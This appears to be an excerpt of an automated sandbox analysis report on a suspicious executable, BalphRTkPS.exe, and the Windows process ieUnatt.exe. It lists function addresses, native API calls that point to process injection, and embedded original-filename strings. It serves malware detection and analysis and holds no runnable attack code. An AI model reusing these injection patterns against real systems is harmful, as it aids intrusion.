                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_04EC2D10
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_04EC2EE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_04EC2E80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2FE0 NtCreateFile,LdrInitializeThunk,8_2_04EC2FE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2FB0 NtResumeThread,LdrInitializeThunk,8_2_04EC2FB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2F30 NtCreateSection,LdrInitializeThunk,8_2_04EC2F30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2AF0 NtWriteFile,LdrInitializeThunk,8_2_04EC2AF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2AD0 NtReadFile,LdrInitializeThunk,8_2_04EC2AD0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_04EC2BE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04EC2BF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_04EC2BA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2B60 NtClose,LdrInitializeThunk,8_2_04EC2B60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC35C0 NtCreateMutant,LdrInitializeThunk,8_2_04EC35C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC39B0 NtGetContextThread,LdrInitializeThunk,8_2_04EC39B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2CF0 NtOpenProcess,8_2_04EC2CF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2CC0 NtQueryVirtualMemory,8_2_04EC2CC0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2C00 NtQueryInformationProcess,8_2_04EC2C00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2DB0 NtEnumerateKey,8_2_04EC2DB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2D00 NtSetInformationFile,8_2_04EC2D00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2EA0 NtAdjustPrivilegesToken,8_2_04EC2EA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2E30 NtWriteVirtualMemory,8_2_04EC2E30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2FA0 NtQuerySection,8_2_04EC2FA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2F90 NtProtectVirtualMemory,8_2_04EC2F90
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2F60 NtCreateProcessEx,8_2_04EC2F60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2AB0 NtWaitForSingleObject,8_2_04EC2AB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2B80 NtQueryInformationFile,8_2_04EC2B80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC3090 NtSetValueKey,8_2_04EC3090
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC3010 NtOpenDirectoryObject,8_2_04EC3010
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC3D70 NtOpenThread,8_2_04EC3D70
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC3D10 NtOpenProcessToken,8_2_04EC3D10
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D99A60 NtDeleteFile,8_2_02D99A60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D99B00 NtClose,8_2_02D99B00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D99810 NtCreateFile,8_2_02D99810
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D99970 NtReadFile,8_2_02D99970
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D99C50 NtAllocateVirtualMemory,8_2_02D99C50
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 0_2_012AD5840_2_012AD584
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 0_2_07507FF00_2_07507FF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 0_2_0750B7E00_2_0750B7E0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 0_2_0750B39A0_2_0750B39A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 0_2_0750B3A80_2_0750B3A8
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 0_2_0750AF700_2_0750AF70
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 0_2_07507FE00_2_07507FE0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 0_2_0750CBE80_2_0750CBE8
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 0_2_0750C9770_2_0750C977
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_00418BF36_2_00418BF3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0042F2536_2_0042F253
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_004022E06_2_004022E0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0041046B6_2_0041046B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_004104736_2_00410473
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_004025F06_2_004025F0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_00416DF36_2_00416DF3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_00416DAC6_2_00416DAC
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0040E6736_2_0040E673
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_004106936_2_00410693
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_00402F256_2_00402F25
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_00402F306_2_00402F30
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0040E7C36_2_0040E7C3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0040E7B76_2_0040E7B7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C81586_2_017C8158
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_018001AA6_2_018001AA
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017DA1186_2_017DA118
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017301006_2_01730100
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F81CC6_2_017F81CC
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D20006_2_017D2000
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FA3526_2_017FA352
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_018003E66_2_018003E6
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174E3F06_2_0174E3F0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E02746_2_017E0274
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C02C06_2_017C02C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_018005916_2_01800591
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017405356_2_01740535
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F24466_2_017F2446
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017EE4F66_2_017EE4F6
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017407706_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017647506_2_01764750
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173C7C06_2_0173C7C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175C6E06_2_0175C6E0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017569626_2_01756962
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0180A9A66_2_0180A9A6
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A06_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174A8406_2_0174A840
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017428406_2_01742840
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E8F06_2_0176E8F0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017268B86_2_017268B8
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FAB406_2_017FAB40
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F6BD76_2_017F6BD7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173EA806_2_0173EA80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174AD006_2_0174AD00
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173ADE06_2_0173ADE0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01758DBF6_2_01758DBF
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740C006_2_01740C00
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730CF26_2_01730CF2
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E0CB56_2_017E0CB5
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B4F406_2_017B4F40
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01760F306_2_01760F30
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01782F286_2_01782F28
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174CFE06_2_0174CFE0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01732FC86_2_01732FC8
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BEFA06_2_017BEFA0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740E596_2_01740E59
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FEE266_2_017FEE26
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FEEDB6_2_017FEEDB
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752E906_2_01752E90
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FCE936_2_017FCE93
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172F1726_2_0172F172
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0177516C6_2_0177516C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174B1B06_2_0174B1B0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0180B16B6_2_0180B16B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F70E96_2_017F70E9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FF0E06_2_017FF0E0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017EF0CC6_2_017EF0CC
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017470C06_2_017470C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172D34C6_2_0172D34C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F132D6_2_017F132D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0178739A6_2_0178739A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E12ED6_2_017E12ED
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175B2C06_2_0175B2C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017452A06_2_017452A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F75716_2_017F7571
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017DD5B06_2_017DD5B0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017314606_2_01731460
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FF43F6_2_017FF43F
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FF7B06_2_017FF7B0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F16CC6_2_017F16CC
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017499506_2_01749950
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175B9506_2_0175B950
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D59106_2_017D5910
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AD8006_2_017AD800
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017438E06_2_017438E0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FFB766_2_017FFB76
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B5BF06_2_017B5BF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0177DBF96_2_0177DBF9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175FB806_2_0175FB80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B3A6C6_2_017B3A6C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FFA496_2_017FFA49
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F7A466_2_017F7A46
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017EDAC66_2_017EDAC6
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017DDAAC6_2_017DDAAC
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01785AA06_2_01785AA0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F7D736_2_017F7D73
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F1D5A6_2_017F1D5A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01743D406_2_01743D40
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175FDC06_2_0175FDC0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B9C326_2_017B9C32
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FFCF26_2_017FFCF2
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FFF096_2_017FFF09
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01703FD26_2_01703FD2
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01703FD56_2_01703FD5
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FFFB16_2_017FFFB1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01741F926_2_01741F92
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01749EB06_2_01749EB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F3E4F68_2_04F3E4F6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F424468_2_04F42446
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F505918_2_04F50591
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E905358_2_04E90535
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EAC6E08_2_04EAC6E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E8C7C08_2_04E8C7C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E907708_2_04E90770
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EB47508_2_04EB4750
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F481CC8_2_04F481CC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F501AA8_2_04F501AA
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F181588_2_04F18158
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E801008_2_04E80100
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F2A1188_2_04F2A118
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F102C08_2_04F102C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F302748_2_04F30274
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F503E68_2_04F503E6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E9E3F08_2_04E9E3F0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4A3528_2_04F4A352
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E80CF28_2_04E80CF2
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F30CB58_2_04F30CB5
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E90C008_2_04E90C00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E8ADE08_2_04E8ADE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EA8DBF8_2_04EA8DBF
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E9AD008_2_04E9AD00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4EEDB8_2_04F4EEDB
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4CE938_2_04F4CE93
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EA2E908_2_04EA2E90
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E90E598_2_04E90E59
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4EE268_2_04F4EE26
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E9CFE08_2_04E9CFE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E82FC88_2_04E82FC8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F0EFA08_2_04F0EFA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F04F408_2_04F04F40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04ED2F288_2_04ED2F28
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EB0F308_2_04EB0F30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EBE8F08_2_04EBE8F0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E768B88_2_04E768B8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E9A8408_2_04E9A840
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E928408_2_04E92840
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E929A08_2_04E929A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F5A9A68_2_04F5A9A6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EA69628_2_04EA6962
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E8EA808_2_04E8EA80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F46BD78_2_04F46BD7
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4AB408_2_04F4AB40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E814608_2_04E81460
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4F43F8_2_04F4F43F
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F2D5B08_2_04F2D5B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F475718_2_04F47571
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F416CC8_2_04F416CC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4F7B08_2_04F4F7B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4F0E08_2_04F4F0E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F470E98_2_04F470E9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E970C08_2_04E970C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F3F0CC8_2_04F3F0CC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E9B1B08_2_04E9B1B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC516C8_2_04EC516C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E7F1728_2_04E7F172
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F5B16B8_2_04F5B16B
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F312ED8_2_04F312ED
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EAB2C08_2_04EAB2C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E952A08_2_04E952A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04ED739A8_2_04ED739A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E7D34C8_2_04E7D34C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4132D8_2_04F4132D
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4FCF28_2_04F4FCF2
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F09C328_2_04F09C32
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EAFDC08_2_04EAFDC0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F47D738_2_04F47D73
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E93D408_2_04E93D40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F41D5A8_2_04F41D5A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E99EB08_2_04E99EB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4FFB18_2_04F4FFB1
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E91F928_2_04E91F92
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4FF098_2_04F4FF09
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E938E08_2_04E938E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EFD8008_2_04EFD800
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E999508_2_04E99950
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EAB9508_2_04EAB950
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F3DAC68_2_04F3DAC6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04ED5AA08_2_04ED5AA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F2DAAC8_2_04F2DAAC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F03A6C8_2_04F03A6C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F47A468_2_04F47A46
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4FA498_2_04F4FA49
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F05BF08_2_04F05BF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04ECDBF98_2_04ECDBF9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EAFB808_2_04EAFB80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4FB768_2_04F4FB76
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D823908_2_02D82390
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7D2C08_2_02D7D2C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7D2B88_2_02D7D2B8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D9C0A08_2_02D9C0A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7B6108_2_02D7B610
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7B6048_2_02D7B604
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7B4C08_2_02D7B4C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7D4E08_2_02D7D4E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D85A408_2_02D85A40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D83BF98_2_02D83BF9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D83C408_2_02D83C40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051AE4438_2_051AE443
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051AE7E18_2_051AE7E1
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051AE3288_2_051AE328
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051AD8A88_2_051AD8A8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051ACB638_2_051ACB63
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 04E7B970 appears 272 times
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 04EC5130 appears 37 times
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 04F0F290 appears 105 times
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 04EFEA12 appears 86 times
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 04ED7E54 appears 98 times
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: String function: 017AEA12 appears 86 times
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: String function: 01775130 appears 56 times
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: String function: 017BF290 appears 105 times
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: String function: 0172B970 appears 275 times
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: String function: 01787E54 appears 99 times
                Source: BalphRTkPS.exe, 00000000.00000002.2338213007.0000000007510000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000000.00000002.2335861440.0000000004049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000000.00000002.2339792394.0000000008160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000000.00000002.2333596788.000000000132E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000000.00000002.2334368001.0000000003088000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000000.00000000.2155325332.0000000000C7E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepldkV.exe< vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEUNATT.EXED vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000006.00000002.2499450308.000000000182D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BalphRTkPS.exe
